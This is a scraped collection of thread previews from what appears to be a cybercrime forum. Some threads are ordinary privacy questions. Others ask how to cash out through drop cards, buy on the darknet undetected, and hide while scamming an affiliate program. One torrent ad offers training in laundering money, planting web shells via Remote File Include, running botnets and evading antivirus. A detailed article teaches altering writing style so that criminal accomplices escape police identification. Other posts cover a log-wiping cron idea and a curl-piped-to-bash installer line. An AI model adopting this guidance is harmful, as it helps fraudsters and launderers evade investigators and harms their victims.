Сам больше склоняюсь к обмену на карту дропа/купленную карту и потом дроп просто снимает в банкомате и привозит вам. Но в любой момент же может прилететь 115-ФЗ блок как с этим быть?

The Ultimate Kali Linux Book: Second Edition (2022)

ID: 676533bbb4103b69df371b30
Thread ID: 63486
Created: 2022-02-25T14:22:42+0000
Last Post: 2022-03-18T22:12:21+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 9 Views: 929

Эта книга - исчерпывающее руководство для новичков в Kali Linux и тестировании на проникновение, которое быстро введет вас в курс дела. Используя реальные сценарии, вы поймете, как создать лабораторию и изучите основные концепции тестирования на проникновение. На протяжении всей книги вы сосредоточитесь на сборе информации и даже познакомитесь с различными инструментами оценки уязвимостей, входящими в состав Kali Linux. Вы научитесь обнаруживать целевые системы в сети, выявлять недостатки в защите устройств, использовать слабые места в защите и получать доступ к сетям, организовывать операции командования и контроля (C2) и проводить тестирование на проникновение в веб-приложения. В этом обновленном втором издании вы сможете взломать Active Directory и использовать корпоративные сети. Наконец, в этой книге описаны лучшие практики выполнения сложных методов тестирования на проникновение в веб-приложения в высокозащищенной среде.

[ The Ultimate Kali Linux Book.epub

](https://cloud.mail.ru/public/BjUN/K6TshDszL)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Как безопасно пополнить криптокошелек?

ID: 676533bbb4103b69df3719a4
Thread ID: 106652
Created: 2024-01-25T13:47:43+0000
Last Post: 2024-02-15T22:09:20+0000
Author: highlvl
Replies: 15 Views: 926

Всем доброго времени суток!
Как по мне, то я уже достаточно прочитал про безопасность в интернете (возможно нет, не отрицаю).
Каждый адекватный персонаж знает, что совершать любые покупки в интернете нужно с помощью криптовалют, но **??вопрос??

Как безопасно купить ту самую криптовалюту, для совершения дальнейших платежей с её помощью?**

Как пример с банковского счета в рублях

Если у кого-то есть толковый совет по этому поводу, буду ждать ваши мнения. За полноценную цепочку буду особенно благодарен.

Hacking anonimo

ID: 676533bbb4103b69df371c1a
Thread ID: 49632
Created: 2021-03-20T10:50:21+0000
Last Post: 2021-03-20T16:32:24+0000
Author: dorian19891989
Replies: 3 Views: 925

Hola, estoy tratando de aprender a realizar una auditoría completamente anónima, normalmente trabajo con kali linux y uso "Anonsurf" a través de tor.

Pero me gustaría saber si alguien puede encontrarme o es mejor usar un proxy. Porque las VPN no son seguras en absoluto.

Sé que es más seguro hacerlo a través de la red Wi-Fi pública o de otra persona, pero no tengo una computadora portátil a mano.

План Apple по сканированию iPhone в США вызывает тревогу. Тотальная слежка начинается

ID: 676533bbb4103b69df371bb7
Thread ID: 55039
Created: 2021-08-09T10:30:54+0000
Last Post: 2021-08-25T19:48:10+0000
Author: peacemaker
Replies: 6 Views: 925

Apple [объявила о планах сканировать iPhone на предмет жестокого обращения с детьми](https://apple.sjv.io/c/321564/435031/7613?subid1=US-011-3628454-000-000000-web&u=https://www.apple.com/child- safety/) , что сразу же вызвало обеспокоенность по поводу конфиденциальности пользователей.

Apple заявляет, что ее система автоматизирована, не сканирует сами изображения, использует некоторую форму системы хеш-данных для выявления материалов о сексуальном насилии над детьми и заявляет, что у нее есть некоторые средства защиты от сбоев для защиты конфиденциальности.

Защитники конфиденциальности предупреждают, что теперь, когда Apple создала такую систему, Apple встала на тернистый путь к неумолимому расширению сканирования контента на устройствах и составления отчетов, которые могут — и, вероятно, будут — использоваться некоторыми странами.

Что делает система Apple

В системе есть три основных элемента, которые будут скрываться в iOS 15, iPadOS 15 и macOS Monterey, когда они появятся в конце этого года.

1. Сканирование ваших изображений

Система Apple сканирует все изображения, хранящиеся в iCloud Photos, чтобы определить, соответствуют ли они базе данных CSAM, хранящейся в Национальном центре пропавших без вести и эксплуатируемых детей (NCMEC).

Изображения сканируются на устройстве с использованием базы данных известных хэшей изображений CSAM, предоставленных NCMEC и другими организациями по безопасности детей. Apple преобразует эту базу данных в нечитаемый набор хэшей, который надежно хранится на устройствах пользователей.

Когда изображение сохраняется в iCloud Photos, происходит процесс сопоставления. Apple получает предупреждение в случае, если учетная запись превышает пороговое значение, состоящее из нескольких экземпляров известного содержимого CSAM. В случае предупреждения данные проверяются вручную, учетная запись отключается и об этом информируется NCMEC.Однако система не идеальна. Компания заявляет, что вероятность неправильной пометки учетной записи составляет менее одного триллиона. У Apple более миллиарда пользователей, а это означает, что вероятность того, что кто-то будет неправильно идентифицирован каждый год, выше 1/1000. Пользователи, которые считают, что они были помечены ошибочно, могут подать апелляцию.

Изображения сканируются на устройстве.

2. Сканирование ваших сообщений

Система Apple использует машинное обучение на устройстве для сканирования изображений в сообщениях, отправленных или полученных несовершеннолетними, на предмет содержания откровенно сексуального характера, предупреждая родителей, если такие изображения обнаружены. Родители могут включить или отключить систему, и любой такой контент, полученный ребенком, будет размыт.

Если ребенок попытается отправить контент откровенно сексуального характера, он будет предупрежден, и родители смогут об этом сообщить. Apple заявляет, что не получает доступа к изображениям, которые сканируются на устройстве.

3. Наблюдая за тем, что вы ищете

Третья часть состоит из обновлений Siri и Search. Apple заявляет, что теперь они предоставят родителям и детям расширенную информацию и помогут, если они столкнутся с опасными ситуациями. Siri и Search также будут вмешиваться, когда люди делают то, что считается поисковыми запросами, относящимися к CSAM, объясняя, что интерес к этой теме проблематичен.

Apple любезно сообщает нам, что ее программа «амбициозна», и ее усилия будут «со временем развиваться и расширяться».

Немного технических данных

Компания [опубликовала обширный технический документ,](https://apple.sjv.io/c/321564/435031/7613?subid1=US-011-3628454-000-000000-web&u=https://www.apple.com/child- safety/pdf/CSAM_Detection_Technical_Summary.pdf) который объясняет немного больше о ее системе. В документе стараются убедить пользователей, что компания ничего не узнает об изображениях, не соответствующих базе данных,

Технология Apple под названием NeuralHash анализирует известные изображения CSAM и преобразует их в уникальный номер, специфичный для каждого изображения. Только другое изображение, которое кажется почти идентичным, может дать такое же число; например, изображения, которые отличаются по размеру или качеству транскодирования, по-прежнему будут иметь одинаковое значение NeuralHash.

Когда изображения добавляются в Фото iCloud, они сравниваются с этой базой данных для определения совпадения.

Если совпадение обнаружено, создается ваучер криптографической безопасности, который, насколько я понимаю, также позволит обозревателю Apple расшифровать и получить доступ к нарушающему изображению в случае достижения порогового значения такого контента и необходимости действий.

«Apple может узнать релевантную информацию об изображении только после того, как учетная запись будет иметь больше, чем пороговое количество совпадений CSAM, и даже в этом случае только для совпадающих изображений», — заключается в документе.

Click to expand...

Apple не уникальна в этом

Не только Apple обязана делиться изображениями CSAM с властями. По закону любая американская компания, которая обнаруживает такие материалы на своих серверах, должна сотрудничать с правоохранительными органами для расследования. Facebook, Microsoft и Google уже имеют технологии, которые сканируют такие материалы, передаваемые через электронную почту или платформы обмена сообщениями.

Разница между этими системами и этой заключается в том, что анализ выполняется на устройстве, а не на серверах компании.

Apple всегда заявляла, что ее платформы обмена сообщениями являются зашифрованными, но это становится небольшой семантической претензией, если содержимое устройства человека сканируется еще до того, как шифрование будет выполнено.

Защита детей — это, конечно, то, что поддерживают самые рациональные люди. Но защитников конфиденциальности беспокоит то, что некоторые правительства теперь могут попытаться заставить Apple искать другие материалы на устройствах людей.

Например, правительство, которое запрещает гомосексуальность, может требовать такой контент. Что произойдет, если ребенок-подросток в стране, которая запрещает небинарную сексуальную активность, попросит у Siri помощи, чтобы сделать камингаут? А как насчет незаметных устройств для прослушивания окружающей среды, таких как HomePods?

И пока неясно, как Apple сможет защитить себя от подобной нестабильности.

Защитники конфиденциальности чрезвычайно встревожены

Большинство защитников конфиденциальности не поддерживает веру в приверженность Apple обеспечению конфиденциальности пользователей.

Как может любой пользователь почувствовать, что конфиденциальность защищена, если само устройство шпионит за ним, и они не могут контролировать это.

Фонд [Electronic Frontier Foundation](https://www.eff.org/deeplinks/2021/08/apples-plan-think-different- about-encryption-opens-backdoor-your-private-life) (EFF) предупреждает, что этот план эффективно создает лазейку в безопасности.

«Все, что потребуется, чтобы расширить узкую лазейку, которую создает Apple, — это расширение параметров машинного обучения для поиска дополнительных типов контента или настройка флагов конфигурации для сканирования не только детских, но и любых учетных записей. Это не скользкая дорожка; это полностью построенная система, которая просто ждет, пока внешнее давление внесет малейшие изменения».

Когда Apple разрабатывает технологию, способную сканировать зашифрованный контент, вы не можете просто сказать: «Что ж, мне интересно, что правительство Китая будет делать с этой технологией».

Альтернативные аргументы

Есть и другие аргументы. Одним из наиболее убедительных из них является то, что серверы у интернет-провайдеров и поставщиков электронной почты уже сканируются на предмет наличия такого контента, и что Apple создала систему, которая сводит к минимуму участие человека и отмечает проблему только в том случае, если она определяет несколько совпадений между базой данных CSAM и контент на устройстве.

Нет сомнений в том, что в группе риска дети.

Из почти 26 500 беглецов, о которых было сообщено NCMEC в 2020 году, каждый шестой, вероятно, стал жертвой торговли детьми в целях сексуальной эксплуатации. CyberTipline получил более 21,7 миллиона отчетов, связанных с той или иной формой CSAM в 2020 году.

Создавая систему защиты детей от таких вопиющих преступлений, Apple устраняет аргумент, который некоторые могли бы использовать для оправдания бэкдоров устройств в более широком смысле.

Большинство из нас согласны с тем, что детей следует защищать, но сможет ли Apple противостоять любой ползучей миссии со стороны правительств?

Этот последний вызов является самой большой проблемой, учитывая, что Apple, когда ее подталкивают, всегда будет [следовать законам правительств стран, в которых она ведет бизнес](https://www.cnbc.com/2017/08/01/apple-ceo-tim-cook- defends-decision-to-remove-vpn-apps-in-china.html).

«Какими бы благие намерения не одолевали Apple, с помощью этого, компания развертывает массовую слежку по всему миру», — предупредил известный защитник конфиденциальности Эдвард Сноуден . Если они могут сканировать CSAM сегодня, «они могут сканировать что угодно завтра».

Click to expand...

Ordering on dark net without getting caught?

ID: 676533bbb4103b69df371c73
Thread ID: 44714
Created: 2020-11-23T23:35:51+0000
Last Post: 2020-12-03T09:58:12+0000
Author: RootExploit
Replies: 3 Views: 917

Any ideas to purchase some items and to receive them, what could i do?
Send to a fake location? fake name? thanks.

VPS логи, метаданные, инод

ID: 676533bbb4103b69df371941
Thread ID: 119978
Created: 2024-08-01T03:14:01+0000
Last Post: 2024-08-01T03:14:01+0000
Author: PPav
Prefix: Мануал/Книга
Replies: 0 Views: 917

По старинке всегда отключаю логи, историю запросов в териминале, и т.п в VPS.
Но недавно хотел настроить парную работу 53 и 5353х портов (DNS+DNSCrypt) и вроде бы всё сделал правильно, отдельно оба сервиса работают, но совместно нет, что-то было неправильно, и нужны были логи.
А логи выключены, заданы такие права разным юзерам на VPS, что легче всё снести, и по новой запустить VPS, чем восстанавливать всё это.
Вот собственно после этого пришла такая идея, а что если, запустить крон, и написать bash скрипт, который будет скажем каждую минуту вычищать все логи, метаданные, и переписывать удаленные файлы помеченные инод?

Вот скрипт на обсуждение! По-моему, всё работает прекрасно!
Пользуйтесь на здоровье, а если есть что сказать, обязательно пишите, может что-то упустил...

You must have at least 10 reaction(s) to view the content.

Ребята у кого можно покупать прокси микс по дешёвке???)

ID: 676533bbb4103b69df371d38
Thread ID: 30895
Created: 2019-08-08T07:47:34+0000
Last Post: 2019-08-12T23:24:16+0000
Author: Conormagregor
Replies: 1 Views: 916

Ребята у кого можно покупать прокси микс по дешёвке???)

Практическая форензика в Linux (2021)

ID: 676533bbb4103b69df371a8c
Thread ID: 60666
Created: 2021-12-29T16:37:55+0000
Last Post: 2023-01-11T10:16:55+0000
Author: johnsm
Prefix: Мануал/Книга
Replies: 11 Views: 914

Для ознакомления only. Если понравилась книжка - не забудьте приобрести ее в издательстве.

You must have at least 5 reaction(s) to view the content.

Residential Proxy Ips question

ID: 676533bbb4103b69df371cd1
Thread ID: 37621
Created: 2020-05-22T04:28:35+0000
Last Post: 2020-05-22T04:28:35+0000
Author: beserious
Replies: 0 Views: 909

Hello

I don't understand from where these people get so many IPs for their services. like luminati and microleaves.
They are claiming they have 30-40 Million IPs pool in their proxies. How do they get? if they buy such huge IPs from datacenters then it would cost them a lot.
Is there any solution to get such a huge IPs pool at cheaper or free?

Защити себя по методикам спецслужб. Бывший спецагент раскрывает методы, которые могут спасти жизнь вам и вашей семье. [Джейсон Хансон]

ID: 676533bbb4103b69df371a98
Thread ID: 75710
Created: 2022-11-12T09:23:43+0000
Last Post: 2022-11-12T09:23:43+0000
Author: Pirate
Prefix: Мануал/Книга
Replies: 0 Views: 907

Защити себя по методикам
спецслужб. Бывший спецагент раскрывает методы, которые могут спасти жизнь вам и вашей семье [Джейсон Хансон] перевод с английского Наталии Рудницкой, 2016
Бывший офицер ЦРУ Джейсон Хансон знает все о том, как
не стать жертвой разбойного нападения или мошенничества.

В своей книге он предупреждает об опасностях, которые подстерегают нас на улице и на парковке, в путешествии и в собственном доме, разоблачает многие уловки современных злоумышленников
и учит быть готовым к любым неожиданностям.

Профессиональные приемы сотрудников спецслужб, которые вы
освоите, прочитав его книгу, помогут вам защитить себя и свою
семью в любой ситуации.

![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FZM3j2wjgDajh9alFgJ7LYoas9mXty5YhygZVprRCUxaFL- VnE9DzoGUvthc7cqbOVYUCl- KTcJEJz6b09ntcxHyyijQXimQ8Urkl9Hj5KmYhxp_uRm8_lr13FzrxSJ4eccfYWizmbo- GQ3rQL6SmmgMkWVHhgwJzX3GD-Q3Nqglq2A8Eu_HIjzfphnhqhDxEnFSvhD91eII3EYtrHNf1biAuN7uUGql5ahqbWDCvMZ43aOCuaufS5DFyTfNSJP71OrBa9ES- jU1KEglEO49bDnuXsgKdDoOdSHacn37Zg6rMsfWj1DK14YunOthzQyq67unmk8nFbIQEqG_AfWFwTQ&hash=5f6bf92f8bdfdc306365aeb7a02708b7&return_error=1)

white2hack

Защити себяпо методикам спецслужб. Бывший спецагент раскрывает методы, которые могут спасти жизнь вам и вашей семье, Джейсон Хансон, перевод с английского Наталии Рудницкой, 2016

t.me

Two encrypted operating system on SSD, VeraCrypt

ID: 676533bbb4103b69df371920
Thread ID: 120555
Created: 2024-08-11T07:15:52+0000
Last Post: 2024-10-05T19:43:40+0000
Author: Niteks3
Replies: 10 Views: 906

I don't know if it's completely possible, as I haven't put it into practice yet, but here we go: My idea is to encrypt a new SSD using VeraCrypt, then I would put 2 operating systems on it: 1 Windows 7/10 and an Endeavour OS, both also encrypted. When I turn on the PC, a black VeraCrypt screen will appear for me to enter the password that will unlock the system, so if I enter PASSWORD_1, it will enter Windows and if I enter PASSWORD_2, it will enter Endeavour OS.

I think this is good protection because even if they find it very suspicious that you have an encrypted system "not being a criminal" and even if they put a gun to your head forcing you to enter the password, you can enter the password that will unlock Windows and everything will be fine.

An addon: I thought you could also put some porn videos in a Windows folder, to justify some of the nervousness about entering the password because of the embarrassment.

Well, I'm open to hearing anything about the idea

Ультимативная анонимность Windows. WireGuard+TOR+OpenVPN

ID: 676533bbb4103b69df3719aa
Thread ID: 107446
Created: 2024-02-04T11:40:42+0000
Last Post: 2024-02-10T07:32:02+0000
Author: ThorZirael
Prefix: Видео
Replies: 11 Views: 887

Тайм-кода:

01:54 Почему нельзя использовать просто VPN

02:23 Загружаем Whonix и VirtualBox

03:06 Загружаем Windows ISO

04:23 Установка VirtualBox

05:06 Установка Windows на VirtualBox

09:16 Установка Whonix на VirtualBox

11:38 Настройка работы Windows через Whonix

17:02 Анонимная регистрация VPS сервера и почты

23:54 Анонимная установка OpenVPN

31:13 Шифруем Windows в VirtualBox

31:49 Создаем клон Windows в VirtualBox

32:23 Проверка и тест системы

33:31 WireGuard + TOR + VPN

33:51 Дополнительная информации к видео

Хотите ли Вы чтоб ВСЕ Ваши любимые программы работали максимально анонимно через ТОР+VPN без каких-либо ограничений и без риска утечки IP адреса? Тогда это видео для Вас, это самая подробная инструкция как настроить Windows чтоб он работал через TOR, и при этом у вас ВСЕ работало, т.е. все программы у вас будут запускаться, все сайты открываться, и никаких блокировок за использование TOR.

Почему мы не можем использовать просто VPN для обеспечения анонимности я расскажу в отдельном видео, которое выйдет следующим на канале.

Tor невероятно анонимен, и хочется использовать его, с учетом того что он бесплатен. Если в двух словах, то сеть TOR это цепочка из 3-х ip адресов, т.е. ваш компьютер сначала подключается к 1 му хосту, потом от 1-го к 2-му, и 2-го к 3-му хосту и от него только в интернет, к тому ресурсу или сайту, который вам необходим, при этом используется 3-х слойное шифрование от вашего устройства до 3-го хоста и все эти устройства постоянно меняются и чередуются между собой, т.е. сейчас у вас один набор из 3-х нод, и через пол часа может быть уже совершено другой.

Конечно же TOR имеет свою ложку дегтя, даже целых 3 ложки:

- блокировки от ресурсов, которые не хотят, чтоб ими анонимно пользовались, это выражается как минимум в постоянной каптче, которая присутствует на КАЖДОМ сайте, который открывается с TOR, и заканчивается полной блокировкой TOR ip, т.е. вы вообще не можете открыть ресурс и видите 403 ошибку, т.е. блок.

- а также атака которая осуществляется с выходной ноды TOR

- скорость соединение и задержка;

Наша ультимативная сборка решает первые 2 проблемы,

- проблему блокировки ресурсов – у нас будут все ресурсы запускаться, сайты, сервисы не будут знать что вы используете TOR.

- проблему шифрования и атаки с выходной ноды TOR – мы дополняем выходную ноду TOR своим шифрованием OpenVPN на своем анонимном и безопасном сервере.

PUTTY: (https://putty.org.ru/download) https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-installer.msi

WinSCP: https://winscp.net/eng/download.php

OpenVPN: https://openvpn.net/community-downloads/

Для Whonix:

upgade-nonroot

ifconfig

Для установки OpenVPN

sudo apt-get update && sudo apt-get -y upgrade

apt-get install curl

curl -L https://install.pivpn.io | bash

pivpn add nopass --name OpenVPN

Мое авторское видео. Задаем вопросы, пишем идеи для следующего видео. Буду рад.

Анонимность, безопасность матрикс (matrix.org)?

ID: 676533bbb4103b69df371a82
Thread ID: 73837
Created: 2022-10-01T18:57:01+0000
Last Post: 2023-03-16T20:02:58+0000
Author: kingofmoon
Replies: 11 Views: 880

Я про matrix.org
Используете ли вы? Можете поделиться полезными ссылками на матрикс комнаты?

Plastik | Университет Кибербезопасности и Анонимности 2.0 (2018) PCRec

ID: 676533bbb4103b69df371c78
Thread ID: 44672
Created: 2020-11-23T00:20:28+0000
Last Post: 2020-11-23T00:20:28+0000
Author: qwerty666
Replies: 0 Views: 877

Spoiler: Описание:

1. Безопасность:

Настраивать анонимную и безопасную систему

Обналичивать грязные и серые денежные поступления

Обходить банковские проверки

Скрывать подмену fingerprint и IP

Настраивать безопасность системы виртуализации

Шифровать трафик и защищаться от перехвата

Перехватывать трафик в TOR

Владение нашими персональными софтами

Обрести знания по векторам атак и мерами их предотвращения

Создавать изолированную сеть без любых утечек трафика и многое другое

2. Хакинг:

Искать уязвимости методом фаззиннга

Вытягивать Базы Данных и монетизировать данные

Владеть Linux

Массовый сбор серверов

Лить шеллы эксплуатируя Remote File Include

Получать доступы к серверам

Автоматизировать работу

Поднимать свой DNS и лить на него трафик

Поймешь, что данные - самое дорогое в мире и будешь их монетизировать

Работать по трафику

3. Вирусология:

Настраивать и использовать вирусы

Превращать загрузки в деньги

Разбираться в вирусах

Обходить антивирусы

Создавать и контролировать ботнет

Управлять машиной после заражения

Зачищать следы после атаки

4. Соц. инженерия:

Находить подходы к людям

Понимать паттерны поведения

Входить в доверие

Манипулировать поведением

Зарабатывать на хайпах

Составлять планы атаки

Избегать основных ошибки

Может кому пригодится..
Link Torrent File

Стилометрия, не подставляй себя.

ID: 676533bbb4103b69df371902
Thread ID: 108192
Created: 2024-02-13T15:16:18+0000
Last Post: 2024-11-21T15:43:32+0000
Author: OnionNord
Prefix: Статья
Replies: 1 Views: 877

Привет всем, миллион лет не сидел на форумах, зашел, что-то так вдохновился, что уже пишу вторую статью, пока время есть. В этот раз хочу разобрать интересную тему - Стилометрия, я вскольз упоминал об этом в своей прошлой статье, как мне кажется, это очень важная и интересная тема, если ты хочешь соблюдать анонимность в сети, в частности, при общении в чате или на форуме.
Вроде бы, никто не писал об этом, я не нашел по крайней мере, хотя это очень важно. Потому, специально для: xss.is

Введение.
Начнем с теории. Стилометрия — исследование стилистики, обычно включающее статистический анализ и относящееся к письменному тексту. Иногда этот термин может применяться к аналогичному исследованию живописи. Обычно стилометрия используется для атрибуции или датировки текста и применяется как в филологии, так и в юридической экспертизе. Последнее нам и интересно. Проще говоря, стилометрия - это наш личный и уникальный стиль письма, общения.

Судебная лингвистика.
Снова немного теории. Будем разбирать судебную лингвистику, приведу буквально пару известных примеров и в целом обсудим эту тему. В этой области криминалистическая лингвистика, применяемая к кибер-преступлениям, носит название - "Writeprint", отпечаток записи/письма дословно. Writeprint направлен на установление личности, в нашем случае - кибер преступника путем сравнения текста с огромной коллекцией неизменяемых сообщений, в принципе, даже без текстов сравнения этот метод может предоставить личную информацию об авторе, такую как пол, возраст и личность, банально, когда вы сами по глупости рассказали это.

На что трехбуквенные будут обращать внимание, изучая ваш текст?
- Лексические особенности, анализ выбора слов. Например, не товарищ полицейский, а - мусор, и тому подобное. Глупый пример, т.к. многие так пишут, но, это сильно может сузить круг, если вы используете, например, слова, которые употребляют исключительно в каких-либо регионах.
- Синтаксические особенности, анализ стиля письма, структуры предложения, пунктуация.
- Ваши индивидуальные особенности, анализ грамматических ошибок, имхо, это наиболее важный фактор, который следует учитывать, поскольку он обеспечивает относительно высокую точность идентификации вас.

Давайте разберем пару известных примеров.
- Можно привести первый пример из книги "American Kingpin" о том, как агенты изучали стиль письма Dread Pirate Roberts, он же Росс Ульбрихт, он же основатель Silk Road. Во-первых, Росс часто использовал слово "Epic", что могло давать им подсказки, на то, что он, скорее всего, был молод. Круг уже сузили. Также он использовал в своем письме смайлики, emoji. Он никогда не использовал "старомодный" дефис в смайлике в качестве носа, то есть он писал ":)" вместо ":-)". Тем не менее, его единственным отличительным признаком, было то, что вместо того, чтобы писать "да" или "ага" (yes/yeah) на форуме, Ульбрихт вместо этого всегда печатал "yea". Ну, а еще он использовал одну и ту же почту, но это уже другая история и выяснилось это позже.

- Дело OxyMonster, администратор одной из дарк площадок. Общедоступные данные показали, что у Валериуса (OxyMonster) есть аккаунты Instagram и Twitter. Агенты сравнили стиль написания OxyMonster на форуме, когда он был старшим модератором, со стилем написания Валериуса в его Instagram и Twitter. Агенты обнаружили много общего в использовании слов и пунктуации, включая слово "cheers", двойные восклицательные знаки, частое использование кавычек. Это как раз то, о чем я писал выше и в своей предыдущей статье, достаточно глупо так себя подставить, верно?

В очередной раз повторяю. Не используйте тот же стиль письма для работы, общения на форуме и т.д. что и для обычной жизни. В частности, обратите свое внимание на использование одних и тех же слов, фраз, и знаков препинания. Ограничьте количество справочных материалов, а конкретней - соц. сетей, которые трехбуквенный может использовать в качестве текста для сравнения. Не хочется же сесть из-за какого-нибудь ВКонтакте?

В сотый раз повторяю, обратите внимание на мелочи, которые могут сложить ваш пазл.
Как пример, если вы обычно отвечаете людям "ок", попробуйте отвечать "Окей"/"Хорошо" и так далее на вопросы собеседника или комментарий на форуме, либо еще как-то иначе. Вам НИКОГДА не следует использовать слова или фразы из ваших дел (даже если они не находятся в комментариях или еще где-либо публично) в обычных целях, и наоборот. Росс Ульбрихт (Silk Road) использовал "frosty" в качестве названия для своих серверов и для своего канала на YouTube, что помогло убедить правоохранительные органы в том, что Dread Pirate Roberts на самом деле Росс Ульбрихт, ну, к тому же, он использовал свою основную почту, как я писал уже выше.

Как можно противодействовать?
- Сократите объем текста, чтобы трехбуквенные не могли сравнивать вас, пиши кратко и по делу.
- Используйте любой текстовый редактор для исправления любых грамматических/орфографических ошибок, с которыми вы, возможно, регулярно сталкиваетесь.
- Сократите или измените идиомы, которые вы используете при общении, это очень важно.
- Задумайтесь, а как ваша личность влияет на ваш стиль общения: ваш псевдоним молодой? То есть, я имею ввиду, используете вы псевдоним какой-нибудь современной знаменитости, которую, например, не знают люди 50+, условно. Или старше? Более образованный? Или менее образованный?
- Обратите внимание на то, как ваш сленг и орфография могут идентифицировать вас. Во многих регионах сленг отличается друг от друга и чрезвычайно специфичен, запомните это.
- Обратите внимание на использование смайликов. В предыдущем примере агент сделал правильное предположение, что Ульбрихт, вероятно, был молод, потому что он не использовал "старомодный" дефис при написании смайлика.
- Обратите внимание на то, как вы структурируете свой текст. Используете ли вы пробел после точки или запятой? Может вы вообще не используете пробел после знаков препинания? Или используете перед и после знаков.
- Какие символы вы используете в своем письме. Вы используете "дд-мм-гггг" или "мм-дд-гггг" для обозначения дат? Вы используете “Давай спишемся в 22:00“ или ”Давай спишемся в 10 вечера" для обозначения времени?

Смайлики и структурные особенности.
- Жители СНГ, например, используют ")" вместо ":)" или ":-)" для обозначения смайлика. В остальных странах эту скобочку в конце слова люди не понимают и, очевидно, не используют.
- Особенности. В США, например, люди пишут числа с запятыми между цифрами, то есть "10,000$". Это отличается от того, как пишут у нас в СНГ. К этому же можно отнести, пишите ли вы "10кк" или "10млн", например, а может вы пишите "10000000", суть вы поняли.

Обман. Техника перевода.
После исправления орфографии и грамматики. Используйте переводчик для перевода с нескольких разных языков, прежде чем переводить обратно на язык оригинала. Эти переводы туда-сюда изменят ваши сообщения и затруднят снятие отпечатков пальцев. Т.е. русский-английский-французский-итальянский-русский.

Еще один вариант обмана. Если хотите добавить ложку говна, намеренно добавьте несколько ошибок в свои сообщения, и после этого практически всегда допускайте ошибку в одних и тех же словах, составьте список слов, в написании которых вы будете допускать ошибки, допустим, это слова "грамматический" и "произносится", очевидно, что в этот список должно входить намного больше слов.

Найдите список слов, которые вы обычно используете в своем лексиконе. Допустим, мы любим использовать сокращения, например: "ок", "лан", "збс", "кк". Убирайте все эти сокращения, это может существенно изменить ваш текст и то, как вас будут воспринимать. Вы можете изменить большинство слов на другие, например, вы можете изменить "ок" на "Хорошо"/"Договорились" и так далее.

Если вы живете в России и хотите создать впечатление, что вы из Украины, например. Вы можете использовать орфографию, лексику, и сленг в зависимости от региона.
Во-первых, вам нужно будет понять о том, "откуда" ваша вторая личность, не притворяйтесь, что вы из той же Украины, но при этом понятия не имеете ничего о ней, кроме того, что она существует. После того, как вы уже определитесь с подходящим местоположением, из которого будете удостоверять свою личность, изучите языковые различия между двумя языками, сленг, крылатые фразы и так далее.

Вывод.
Поймите и запомните, что вы должны постоянно думать о том, что и как вы пишите в личных сообщениях подельнику, задавая вопросы кому-либо, комментариях на форуме, и так далее. Будем честны, зарегистрироваться мусорам на форуме - дело двух минут, будут сидеть, читать все, что мы пишем, и не отсвечивать. Зачем себя подставлять?

ВАЖНО. Изменение вашего стиля письма для таких целей может в конечном итоге изменить ваш обычный стиль письма, что никак нельзя допускать, контролируйте все, что пишите друзьям от лица Васи Пупкина, и подельникам от лица "TrueHacker", по иронии судьбы это может сделать ваш цифровой почерк отслеживаемым, это что-то на уровне использования своей личной почты для регистрации на каком-нибудь форуме или маркетплейсе.

После того, как ты что-нибудь напишешь, 10 раз прочитай это. Доверяй, но проверяй. Всем добра.

Анонимность для скама партнерки

ID: 676533bbb4103b69df3719f8
Thread ID: 74543
Created: 2022-10-21T09:27:58+0000
Last Post: 2023-10-21T10:02:00+0000
Author: deeloc2006
Replies: 4 Views: 873

Всем добрый день. Есть вопрос
Скамлю забугор партнерку. Проблема порой в нехватке rdp той страны.
Собственно вопрос, можно ли как то использовать связку типа антик+residual носок или может как-то еще можно? Мне главное чтоб максимально походило на домашку, подозреваю что партнерка может и железо спалить, но это только догадки. Любому совету или куда копать буду очень благодарен.

Всем хорошего дня!

Как брать интернет одной виртуальной машине из другой (VirtualBox)?

ID: 676533bbb4103b69df371c3d
Thread ID: 48209
Created: 2021-02-16T21:15:18+0000
Last Post: 2021-02-17T11:17:17+0000
Author: 0x2d4_a8
Replies: 8 Views: 873

Использую VirtualBox.
Возможно ли брать интернет одной виртуальной виртуальной машине из другой, как это делает Whonix, только без Whonix?
А так же возможно ли имея только одну виртуальную машину выдавать ей интернет из хост машины, но через прокси?

Можно ли опубликовать собранную виртуальную машину в открытый доступ? (VirtualBox )

ID: 676533bbb4103b69df371979
Thread ID: 112940
Created: 2024-04-20T09:28:12+0000
Last Post: 2024-04-25T21:55:00+0000
Author: Donte
Replies: 7 Views: 873

Друзья, такой вопрос:
**Можно ли опубликовать собранную виртуальную машину в открытый доступ? Не сохранятся ли на ней личные данные (например, ip или данные кэша системы, с которой была запущена виртуальная машина)?
***Речь идет о VirtualBox 7.0.16 (без пакета расширений).

Связка анонимности для нетсталкера.

ID: 676533bbb4103b69df371c2a
Thread ID: 48815
Created: 2021-03-01T20:25:41+0000
Last Post: 2021-03-02T15:05:33+0000
Author: Konovim
Replies: 2 Views: 870

Чего будет достаточно осинтеру в его темных делишках? Конечно с настроенной системой, браузером и прочим. На базе GNU/Linux.

Свой WireGuard vpn + Unboud dns
Раздать тор + vpn
Double vpn + Socks5

Нужна скорость и анонимность.
Не скомпрометировать себя и свои действия.

How to safely surf the deep web without Tails?

ID: 676533bbb4103b69df371c53
Thread ID: 47025
Created: 2021-01-20T11:16:03+0000
Last Post: 2021-01-20T15:17:29+0000
Author: josefibo
Replies: 5 Views: 863

Olá, gostaria que o conhecimento me desenvolvesse.

Совет по безопасности

ID: 676533bbb4103b69df371ad5
Thread ID: 71266
Created: 2022-08-07T10:03:13+0000
Last Post: 2022-08-17T04:19:15+0000
Author: Vesemir
Replies: 20 Views: 857

Нужен совет\мнение знающих по безопасности и анонимности

Мне нужно: безопасный рабочий комп

Что есть: ос - винда, джаббер через тор, телега купленная трафик через тор, выход в интернет через тор, на мозиле прокси прописан
Периодически производится подключение к дедику, интернет подключен посредством модема с симкой без оформления
ВПН нет
Работа вся через интернет

Вопросы:
1. Где дыры по которым смогут выйти на меня (местоположение)
2. Нужно ли что то добавлять в безопасность?
3. Нужен ли впн и поможет ли он. (Если да, посоветуйте какой, раньше был протон, но с ним что то не то)

Заранее благодарю за ответы

SIBSETI, обсуждение

ID: 676533bbb4103b69df371954
Thread ID: 116335
Created: 2024-06-07T18:44:24+0000
Last Post: 2024-06-08T06:14:18+0000
Author: moonthenight
